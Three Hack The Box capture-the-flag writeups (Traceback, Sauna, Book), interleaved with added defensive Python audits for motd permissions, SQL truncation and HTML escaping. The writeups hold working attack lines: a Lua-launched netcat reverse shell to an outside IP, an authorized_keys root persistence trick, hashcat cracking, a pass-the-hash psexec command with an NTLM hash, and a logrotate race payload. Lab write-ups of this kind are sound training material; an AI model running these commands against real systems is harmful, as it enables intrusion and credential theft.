Hack the Box - Traceback Writeup

System Summary


Initial Enumeration

The nmap scan reveals only SSH and HTTP:


The main page is a simple web page:

Looking in the GitHub repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying their names against the Traceback machine, we can see that one of them is running:


Initial Foothold

Using admin:admin we can get access to a panel where we can upload files, list the contents of directories, etc.



Our first objective is to upload a PHP reverse shell (there are many on the internet) and get a shell:




We're in as user webadmin.
The next step is to enumerate other users.

User Flag

There is another user named sysadmin:

There is a note file in the webadmin home:

Lua is a scripting language.
It also seems that user webadmin can run luvit (a Lua interpreter) as user sysadmin via sudo, without a password.

The obvious step here is to create a script like /tmp/nik.lua:

os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")

and run it as

sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua

and get a shell as sysadmin.

Root Flag

As sysadmin the next step is enumeration with tools like LinEnum or similar.
But it seems that there is nothing interesting.
Looking at the running processes with pspy, we can see that there is a recurring task:

There is a process (running as root) that copies files from /var/backups/.update-motd.d/ to /etc/update-motd.d every minute.
Interesting... it looks like something that cleans up modified files.

In fact, user sysadmin can modify all files in /etc/:

The interesting thing is that sshd will run these files as root to show the MOTD and additional messages in every SSH session created.

So we can modify one of the files above to run commands as root and gain access, but we have to be fast because within one minute the file will be cleaned up.
The sequence of operations is:

  • Add our public SSH key to /home/sysadmin/.ssh/authorized_keys (so we can get access and also upload our key for further use)

  • Run the command echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header, adding our code so that it is executed at the next SSH session

  • Log on as sysadmin via SSH (we should be able to, as we added the key). This should result in the execution of cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys

  • Log on as root (the previous command should have added our key to root's authorized keys)
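Added defender's check, not part of the writeup: a small Python audit of the update-motd.d scripts that sshd (through pam_motd) runs as root at login, flagging any entry a non-root user could alter. The directory path is the standard Ubuntu one; the sample directory built by audit_sample() is constructed here to mimic the Traceback situation, and root_uid is a parameter only so that the self-test works when run as an ordinary user.

```python
import os
import stat
import tempfile

MOTD_DIR = "/etc/update-motd.d"   # scripts run as root by pam_motd at SSH login


def risky_motd_scripts(motd_dir=MOTD_DIR, root_uid=0):
    """Return (name, reason) pairs for entries that a non-root user could tamper
    with. Anything executed as root should be owned by root and writable by the
    owner only; the directory itself is checked under the name '.'."""
    findings = []
    for name in ["."] + sorted(os.listdir(motd_dir)):
        path = os.path.join(motd_dir, name)
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "symlink"))   # target may live somewhere writable
            continue
        if st.st_uid != root_uid:
            findings.append((name, "not owned by root"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((name, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
    return findings


def audit_sample():
    """Build a throwaway directory (constructed sample, not the real box) with one
    sane script and two that other users could edit, then audit it. root_uid is set
    to the current user because the sample files are created by whoever runs this."""
    with tempfile.TemporaryDirectory() as d:
        for name, mode in (("00-header", 0o755),      # fine: owner-only write
                           ("10-help-text", 0o664),   # group can edit it
                           ("99-custom", 0o666)):     # anyone can edit it
            path = os.path.join(d, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        os.chmod(d, 0o755)
        return risky_motd_scripts(d, root_uid=os.getuid())


if __name__ == "__main__":
    # Audit the real directory when it exists, otherwise run the self-test sample.
    findings = risky_motd_scripts() if os.path.isdir(MOTD_DIR) else audit_sample()
    for name, reason in findings:
        print(f"{name}: {reason}")
```

The restore job on Traceback only narrows the window; the durable fix is root-only ownership and owner-only write permission on the scripts and on the directory, which is exactly what this check verifies.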


Hack The Box - Sauna Writeup

Machine summary


Enumeration phase

Since it's a Windows box, I first ran enum4linux with no arguments, and the only information I got was the domain name: EGOTISTICALBANK

Scanning with nmap for open ports:

We can see that the LDAP port is open, which means it should be a domain controller.
But port 80 is also open, so it's worth taking a look at the web page:
Nothing useful here, maybe a couple of forms in "Apply now" and "Contact Us".
Maybe the team page can help:

Initial Foothold and User escalation 


I compiled a few combinations of usernames like

  • s.driver
  • sdriver
  • sophie.driver
  • h.bear
  • ...
Then I used the kerbrute tool to enumerate users with the created user list:



It looks like user fsmith exists.

Now I used impacket's GetNPUsers to get information on user fsmith, in case he doesn't have Kerberos preauth:

Saving the hash in a file like hash.txt and running hashcat:

hashcat -m 18200 --force hash.txt rockyou.txt

it will find that the password is Thestrokes23 in a few seconds:


So now we have a valid user and password, confirmed by smbclient:

With this account we can run evil-winrm or any other WinRM script and get access to the system as fsmith:

User fsmith also has the user flag on its desktop: 1b5520b98d97cf17f24122a55baf70cf

The next step is to enumerate users, groups and privileges in the AD.

Further enumeration

Maybe some of the steps below are not needed but I wanted to get a good knowledge of the system before acting...

Now we can see that there is also a service user, svc_loanmgr:

I can upload SharpHound.ps1 and run it:

And then copy the result locally to analyze it with BloodHound:


Below are some maps from BloodHound:



With rpcclient we can see that there are some users:

There are only standard groups:

And the three non-standard users (fsmith, hsmith, svc_loanmgr) are part of the "Domain Users" group.

We can get the SIDs of these users:

Uploading winPEAS.exe we can get some possible points of escalation:
- No AV installed
- appcmd.exe is installed
- User can create folders in c:\
- LAPS not installed
- Credential Guard not enabled
- LSA Protection not enabled

Using the reg query command to get the default username and password settings:

We can connect with:

  • username: svc_loanmanager
  • password: Moneymakestheworldgoround!

This user has some more privileges than a standard user:

Root escalation

With the user svc_loanmgr we can dump secrets with impacket:

Once we have the NTLM hash of administrator it's easy to run psexec from impacket using

python3 ../../impacket-master/examples/psexec.py  -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff "EGOTISTICALBANK/administrator@10.10.10.175"

and we can get a shell as administrator:

Root flag is: f3ee04965c68257382e31502cc5e881f

Hack The Box - Book Writeup

System Summary



Initial Enumeration


It's a Linux box, so the first step is nmap, but this only shows port 22 and port 80.

The web site looks like a gallery/library site.

Here's the login page:
We can create an account and log in: we are presented with some pages, one of which contains a gallery with some PDFs and images. One page can be used to upload files, but they are not shown in the gallery after upload. I might be an idiot, but I can't find any way to get something on the box (LFI, RFI, SQL injection, file upload, ...)

With a scanner like dirb or dirbuster I can find an administration URL: http://10.10.10.176/admin


The interesting part here is the registration form on the main page:

There is a check that the name and email fields must be no longer than 10 and 20 characters respectively.

After some attempts with various techniques like SQL injection, I came across the "SQL truncation" vulnerability, which I had never encountered before.

If we try to register an existing account (like admin@book.htb 😃) we get the error "User Exists!", which is good.

But we can fool this registration form and change the password of the existing user.
The idea is to add spaces to the name and email fields to reach the length limit plus one character.
Example:

  • name: admin     1 (note the 5 spaces, for a total length of 11)
  • email: admin@book.htb      1 (note the 6 spaces, for a total length of 21)

This fools the SQL SELECT clause that checks for the existence of admin@book.htb, because of the added spaces and the extra character.

But the following SQL INSERT clause will drop the last character and then strip the trailing spaces, effectively overwriting the data of the admin@book.htb record.

Unfortunately the web form is not usable because it doesn't accept spaces in the email field: we have to use Burp Repeater.
We can simulate a registration, send the POST request to the Burp Repeater module and add the spaces in the email field (line 14 of the image below):


With this we can reset the admin@book.htb password to test123,
and we can log in to the admin section:
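The mechanism described above, as an added example that is not the Book application's code: a Python model of the vulnerable registration flow next to a hardened one. The two MySQL behaviours the trick depends on, silent truncation of oversized values when strict mode is off and PAD SPACE comparison that ignores trailing spaces, are emulated in plain Python so the script runs offline; the hardened version uses an in-memory SQLite table. The column widths (10 and 20) come from the writeup; the table layout, field names and the plaintext password storage are assumptions made only to keep the model short.

```python
import sqlite3

NAME_MAX, EMAIL_MAX = 10, 20          # limits stated in the writeup


# --- The two MySQL behaviours the attack relies on, emulated in Python -------
def pad_space_equal(a: str, b: str) -> bool:
    """PAD SPACE collation: trailing spaces are ignored when comparing strings."""
    return a.rstrip(" ") == b.rstrip(" ")


def non_strict_store(value: str, width: int) -> str:
    """Non-strict sql_mode: an oversized value is silently cut to the column width."""
    return value[:width]


# --- Vulnerable flow: existence check, then insert, no server-side length check
class VulnerableUsers:
    def __init__(self):
        self.rows = []   # stands in for the users table (passwords in clear, demo only)

    def register(self, name, email, password):
        # SELECT ... WHERE email = ?   (PAD SPACE comparison)
        if any(pad_space_equal(r["email"], email) for r in self.rows):
            return "User Exists!"
        # INSERT ...                  (values truncated to the column width)
        self.rows.append({"name": non_strict_store(name, NAME_MAX),
                          "email": non_strict_store(email, EMAIL_MAX),
                          "password": password})
        return "Registered"

    def login_ok(self, email, password):
        # SELECT ... WHERE email = ? AND password = ?   (again PAD SPACE)
        return any(pad_space_equal(r["email"], email) and r["password"] == password
                   for r in self.rows)


# --- Hardened flow: validate on the server, reject whitespace, rely on a UNIQUE key
class HardenedUsers:
    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("""CREATE TABLE users(
            name     TEXT NOT NULL CHECK(length(name) <= 10),
            email    TEXT NOT NULL UNIQUE CHECK(length(email) <= 20),
            password TEXT NOT NULL)""")

    @staticmethod
    def _clean(value, width):
        value = value.strip()
        if not value or len(value) > width or any(c.isspace() for c in value):
            raise ValueError("invalid field")
        return value

    def register(self, name, email, password):
        try:
            name, email = self._clean(name, NAME_MAX), self._clean(email, EMAIL_MAX)
        except ValueError:
            return "Invalid input"
        try:
            with self.db:
                self.db.execute("INSERT INTO users VALUES (?, ?, ?)",
                                (name, email, password))
        except sqlite3.IntegrityError:   # UNIQUE(email) violated
            return "User Exists!"
        return "Registered"

    def login_ok(self, email, password):
        row = self.db.execute("SELECT 1 FROM users WHERE email = ? AND password = ?",
                              (email, password)).fetchone()
        return row is not None


def demo():
    """Replay the padded request from the writeup against both implementations."""
    padded_name = "admin" + " " * 5 + "1"            # 11 characters
    padded_email = "admin@book.htb" + " " * 6 + "1"  # 21 characters
    results = {}
    for label, cls in (("vulnerable", VulnerableUsers), ("hardened", HardenedUsers)):
        users = cls()
        users.register("admin", "admin@book.htb", "original-secret")
        results[label] = (users.register(padded_name, padded_email, "test123"),
                          users.login_ok("admin@book.htb", "test123"))
    return results


if __name__ == "__main__":
    print(demo())   # vulnerable: ('Registered', True)   hardened: ('Invalid input', False)
```

On a real MySQL server the equivalent fix is the same set of measures: validate lengths and whitespace server-side, keep a UNIQUE index on email, and run with sql_mode including STRICT_TRANS_TABLES, so an oversized INSERT fails with a "Data too long" error instead of being silently truncated.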




Initial Foothold and User flag

Now that we have two ways of access we can use:

  • standard user to upload malicious things in the coll
  • admin user (admin@book.htb) to download a PDF containing 

Standard User can upload files here:

Admin user can download a PDF of all the collections (the already populated ones plus those generated by user uploads) here:

The second PDF link will generate the PDF below (the fifth element was generated by a user upload):



One might wonder whether we can upload a PHP file with a reverse shell or something similar to pop a shell.
I tried many things for hours with no luck.

Finally I found the solution, which is not related to the file but to the Title or Author field.
It is interpreted as HTML, so we can inject a script.
The solution is to paste code like this in the book title or author:


It will be interpreted and will fetch the content of the file /etc/passwd. Then the web application will generate a PDF using this input.
We can collect the PDF in the admin portal and see:



So now it's time to disclose other files, going directly for /home/reader/.ssh/id_rsa with this script:

And this is the PDF output:


This key can be converted to text with pdftotext and then used to access the box:
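The root cause of the Title/Author injection is that user text is interpolated into the HTML the PDF is rendered from. As an added example that is not the Book application's code, here is the vulnerable rendering beside the escaped version, with a small parser-based check showing that no tag from the input survives escaping. The row template, field names and the sample title are assumptions; the writeup's actual script is deliberately not reproduced.

```python
import html
from html.parser import HTMLParser

# Row template for the HTML document the PDF is rendered from (assumed layout).
ROW = "<tr><td>{title}</td><td>{author}</td></tr>"


def render_row_vulnerable(title: str, author: str) -> str:
    """Drops user input straight into the markup: any tag in it is parsed."""
    return ROW.format(title=title, author=author)


def render_row_safe(title: str, author: str) -> str:
    """Escapes &, <, > and quotes so the renderer shows the text verbatim."""
    return ROW.format(title=html.escape(title, quote=True),
                      author=html.escape(author, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag the parser sees, to inspect rendered output."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment: str) -> list:
    """List of tags an HTML parser would actually create from the fragment."""
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


# Constructed sample: a book title carrying a script tag, standing in for the
# injected title from the writeup.
SAMPLE_TITLE = "<script>alert(1)</script>"


if __name__ == "__main__":
    print(tags_in(render_row_vulnerable(SAMPLE_TITLE, "anon")))  # script tag is live
    print(tags_in(render_row_safe(SAMPLE_TITLE, "anon")))        # only tr/td remain
    print(render_row_safe(SAMPLE_TITLE, "anon"))
```

Escaping at the point of interpolation is the fix for this bug; independently of it, an HTML-to-PDF renderer that runs a browser engine should have script execution and local file access turned off (wkhtmltopdf, for instance, has --disable-javascript and --disable-local-file-access options), so that a missed escape cannot be turned into a file read on the server.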




Root Flag

Upon enumerating we can discover some weird processes that run periodically (around every 4 minutes):

  • a custom logrotate service that rotates the file /home/reader/backup/access.log
  • an automated SSH session to localhost as root that lasts a few seconds
  • a reset script that cleans up /home/reader/backup/

I believe that the box creator wanted users to exploit the race condition in logrotate as explained in https://github.com/whotwagner/logrotten

There is a race condition in logrotate that gives a way to write files into a privileged folder.
We just have to create a script in bash (the payload) and run the exploit present in the GitHub repo.

The exploit is configured to take the payload file and move it to /etc/bash_completion.d/, so the payload will run as a script as soon as a user logs in.

Now let's create a script that copies the root flag (it could be a reverse shell or other commands). Be sure to make it run only if the current user is root (that is the purpose of the `id -u` -eq 0 test):

if [ `id -u` -eq 0 ]; then (/bin/cat /root/root.txt >> /tmp/flag &); fi

Then run the exploit code and wait...
After a few minutes, the exploit stops because the race condition was triggered, and we can see that our payload is now in /etc/bash_completion.d/ as access.log (or a similar name):


After the automated SSH session by root, the flag is copied to the desired location:


Please be aware that this is a race condition and it can be difficult to trigger if many users are trying to exploit it at the same time.